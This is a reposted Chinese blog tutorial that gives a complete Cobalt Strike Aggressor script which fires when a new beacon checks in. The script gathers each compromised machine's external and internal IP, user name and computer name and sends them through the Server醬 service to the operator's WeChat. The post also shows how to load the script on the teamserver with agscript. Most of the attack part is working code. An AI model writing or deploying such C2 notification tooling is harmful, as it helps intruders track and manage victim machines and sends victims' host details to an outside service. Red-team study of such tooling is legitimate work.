CobaltStrike-機器上線微信提醒
這兩天看cs看的頭大
原文地址:http://www.nmd5.com/?p=567
Server醬申請賬號
我們先申請一個Server醬的賬號,使用Github賬號即可登錄,地址:
http://sc.ftqq.com/
申請SCKEY
登錄之后,如下:
點擊發送訊息,申請SCKEY,
撰寫cna
# 回圈獲取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#獲取ip、計算機名、登錄賬號
$externalIP = replace(beacon_info($1, "external"), " ", "_");
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server醬的鏈接
$url = 'https://sc.ftqq.com/此處填寫你Server醬的SCKEY碼.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}將你的SCKEY在上述代碼表明的位置進行替換,保存為cna腳本,
利用agscript加載腳本
如果選擇在本地客戶端加載腳本,那么只有當我們打開CobaltStrike時,機器上線我們才會收到訊息提醒,
所以,我們需要在服務器上使用agscript加載腳本,這樣才能做到機器上線,微信及時提醒的效果,
命令語法:
./agscript [host] [port] [user] [pass] </path/to/file.cna>- [host] #服務器的ip地址,
- [port] #cs的埠號,啟動cs時有顯示,
- [user] #用戶名,用來運行這個腳本的用戶名,隨便即可,
- [pass] #cs的密碼,就是啟動cs時你設定的密碼,
- [path] #cna檔案的路徑,
系結微信
完成這一步就ok了,
進行測驗
先開啟teamserver,再啟動腳本:
測驗成功,
舒服,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/76752.html
標籤:其他